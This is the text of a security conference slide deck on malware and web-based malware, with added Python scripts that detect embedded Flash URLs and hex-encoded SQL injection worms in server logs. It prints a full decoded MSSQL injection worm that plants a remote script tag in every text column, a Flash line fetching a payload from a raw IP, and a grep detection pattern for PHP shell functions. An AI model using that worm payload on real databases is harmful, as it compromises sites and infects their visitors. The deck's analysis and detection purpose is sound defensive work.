
www.cdicconference.com

Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity


SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F
Section Manager, Senior Information Security Consultant, ACIS Professional Center

Let's Party Rock


Next Generation for Malware

Malware Analysis

Web Based Malware

Back to the Past Back to the Future

Lab Challenge


Next Generation of Malware



Old Malware fashion


Executable file
Packer, Crypter => FUD just 1 Week !!

Spyware / Adware
Rogue Security Software
Virus / Worm


USB Autorun

Antivirus Detected

Gotcha !!

Virustotal

Virustotal One Week later

Anubis: Analyzing Binary File

Latest Malware fashion


MS Office + Flash Player
PDF Reader
Mobile Application
Social Network Application
Web Browser Toolbar
Web based Malware

Bypassing Antivirus

Ninja Techniques


Malware Analysis


CVE-2012-0754: SWF in DOC

Iran's Oil and Nuclear Situation.doc
Contains Flash instructing it to download and parse a malformed MP4.

Affected OS versions
Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux and Solaris

Affected mobile versions
Adobe Flash Player before 11.1.111.6 on Android 2.x and 3.x, and before 11.1.115.6 on Android 4.x

Document Analysis
Decompiled Flash from file
this.MyNS.play("http://208.115.230.76/test.mp4");

Whois 208.115.230.76
208.115.230.76  76-230-115-208.static.reverse.lstn.net
Host reachable, 77 ms. average, 2 of 4 pings lost
208.115.192.0 - 208.115.255.255
Limestone Networks, Inc.
400 S. Akard Street Suite 200
Dallas TX 75202
United States
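Finding the Flash object inside such a document and reading the URL it plays is the first triage step. The Python below is an added example, not code from the deck; it assumes only that the SWF is stored somewhere in the file as a plain (FWS) or zlib-compressed (CWS) stream. It scans a blob for SWF headers, inflates the body, and lists any http(s) URLs; the .doc-like sample it scans is constructed in the script, with a documentation-range host standing in for the deck's IP.

```python
import re
import zlib

URL_RE = re.compile(rb"https?://[\x21-\x7e]+")  # printable, non-space URL characters
# Constructed stand-in for the string the decompiled Flash above plays (placeholder host).
SAMPLE_PAYLOAD = b"\x00DoABC\x00this.MyNS.play\x00http://203.0.113.5/test.mp4\x00"


def find_embedded_swf(blob):
    """Yield (offset, version, body) for every plausible SWF header in blob.

    SWF header: 3-byte signature (FWS = plain, CWS = zlib), 1-byte version,
    4-byte little-endian uncompressed length, then the tag body.
    """
    for m in re.finditer(rb"[FC]WS", blob):
        off = m.start()
        if off + 8 > len(blob):
            continue
        sig, version = blob[off:off + 3], blob[off + 3]
        length = int.from_bytes(blob[off + 4:off + 8], "little")
        if sig == b"CWS":
            try:
                body = zlib.decompressobj().decompress(blob[off + 8:])
            except zlib.error:
                continue  # stray "CWS" bytes, not a real compressed SWF
        else:
            body = blob[off + 8:off + length]
        if body:
            yield off, version, body


def extract_urls(blob):
    """Return the sorted set of URLs found inside any embedded SWF body."""
    urls = set()
    for _off, _ver, body in find_embedded_swf(blob):
        urls.update(u.decode("ascii", "replace") for u in URL_RE.findall(body))
    return sorted(urls)


def make_swf(body, compressed):
    """Wrap body in a minimal SWF container (constructed sample, not a real movie)."""
    header = (b"CWS" if compressed else b"FWS") + bytes([10]) + (len(body) + 8).to_bytes(4, "little")
    return header + (zlib.compress(body) if compressed else body)


def build_sample_doc():
    """Constructed .doc-like blob: OLE magic, filler bytes, then the embedded CWS."""
    return b"\xd0\xcf\x11\xe0" + b"A" * 64 + make_swf(SAMPLE_PAYLOAD, compressed=True) + b"\x00" * 16
```

On a real sample the URL strings sit in the ActionScript constant pool, so this plain byte scan finds them without a decompiler; a URL that is built at runtime from pieces still needs the decompiled code.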

Process Monitor network log


Process Monitor network log


Traffic and C&C (us.exe)


Virus Analysis us.exe


Target Analysis
Whois 199.192.156.134
199.192.156.134
Host reachable, 89 ms. average
199.192.152.0 - 199.192.159.255
VPS21 LTD
38958 S FREMONT BLVD
FREMONT CA 94536
United States
zou, jinhe +1-408-205-7550


Web Based Malware



Back to the Past


Web Defacement


Zone-H


DDoS Tool


Hack 4 Fun and Profit


Back to the Future


About My Memory

2008
Oishi website was hacked without defacement; Kaspersky AV alerted on a little JavaScript file

2009
SQL injection worms on MSSQL
Affected many banks in Thailand

2010
Google and Firefox alerted on malware websites
Obfuscated JS to bypass AV

2011
Many websites were blocked by Google malware warnings

SQL Injection Worms


';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x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


SQL Injection Worms (decoded)

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.fengnima.cn/k.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS%20NVARCHAR(4000));EXEC(@S);--
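Because the worm ships its T-SQL as a hex literal cast to NVARCHAR, grepping the web server access log for DECLARE or sysobjects misses it. The Python below is an added example, not code from the deck: it URL-decodes each request, pulls the hex out of the CAST(0x... AS NVARCHAR(n)) wrapper, decodes it as UTF-16LE the way SQL Server does, and reports the indicators and the injected script URL. The log lines and the T-SQL are constructed inline, with a placeholder host instead of the deck's domain.

```python
import re
from urllib.parse import unquote

# Wrapper the worm above uses: a hex literal cast to NVARCHAR and then EXEC'd.
CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+NVARCHAR\(\d+\)\)", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')
SCRIPT_SRC_RE = re.compile(r"<script[^>]*src=['\"]?([^>'\"\s]+)", re.I)
INDICATORS = ("sysobjects", "syscolumns", "cursor", "update [", "<script", "exec(")
# Constructed T-SQL mirroring the decoded worm above; the script host is a placeholder.
SAMPLE_TSQL = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
               "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
               "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
               "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+"
               "''<script src=http://malware.invalid/k.js></script>''') "
               "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor")

def decode_nvarchar_hex(hexstr):
    """SQL Server holds NVARCHAR as UTF-16LE, so the worm's hex literal decodes that way."""
    if len(hexstr) % 2:
        hexstr = "0" + hexstr  # tolerate an odd-length (truncated) literal
    return bytes.fromhex(hexstr).decode("utf-16-le", errors="replace")

def inspect_request(target):
    """Return a finding for one request target, or None when the CAST wrapper is absent."""
    m = CAST_RE.search(unquote(target))
    if not m:
        return None
    payload = decode_nvarchar_hex(m.group(1))
    low = payload.lower()
    return {"indicators": [i for i in INDICATORS if i in low],
            "script_src": SCRIPT_SRC_RE.findall(payload),
            "payload": payload}

def scan_log(lines):
    """Yield (line_number, finding) for every access-log request carrying the pattern."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        finding = inspect_request(m.group(1)) if m else None
        if finding:
            yield n, finding

def build_sample_log():
    """Constructed access-log lines: one clean request and one carrying the encoded worm."""
    hexblob = SAMPLE_TSQL.encode("utf-16-le").hex().upper()
    attack = ("/news.asp?id=12';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + hexblob
              + "%20AS%20NVARCHAR(4000));EXEC(@S);--")
    return ['192.0.2.10 - - [01/Jan/2012:10:00:00 +0700] "GET /news.asp?id=12 HTTP/1.1" 200 512',
            '198.51.100.7 - - [01/Jan/2012:10:00:01 +0700] "GET ' + attack + ' HTTP/1.1" 200 512']
```

The script_src value is what to hunt for in the database afterwards: the worm appends it to every text column of every user table, so a search for the decoded tag across the affected tables shows the cleanup scope.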

Web Application Backdoor


Web Application Backdoor FUD


Redbull.php (PHP Backdoor)


Insert Malicious JS into config.inc.php


Crimepack Exploit Kit


Crimeware Exploit Kit


Drive-By Download
Victim visits the malicious website (web server): malicious JS executes
Redirect to the malware server
Malware server exploits the browser / Flash Player
Reverse shell to the attacker

Google Malware Alert


Google Diagnostic


http://www.stopbadware.org/home/reviewinfo

http://sitecheck.sucuri.net/scanner


http://sucuri.net/malware/malware-entry-mwhta7

http://www.urlvoid.com


Detect Webserver Backdoor

Manual source review
NeoPI (Neohapsis)
PHP Shell Scanner
http://25yearsofprogramming.com/php/findmaliciouscode.htm
grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" /var/www/

PHP Shell Scanner


Undetectable #1


Undetectable #2


JS De-Obfuscate Tool
Google Chrome Developer Tools
Firebug (Firefox plugin)
JSDebug (Firefox plugin)
Javascript Deobfuscator (Firefox plugin)
Malzilla
Rhino
SpiderMonkey

Simple JS Obfuscate



Lab Challenge

Be Safe
www.cdicconference.com
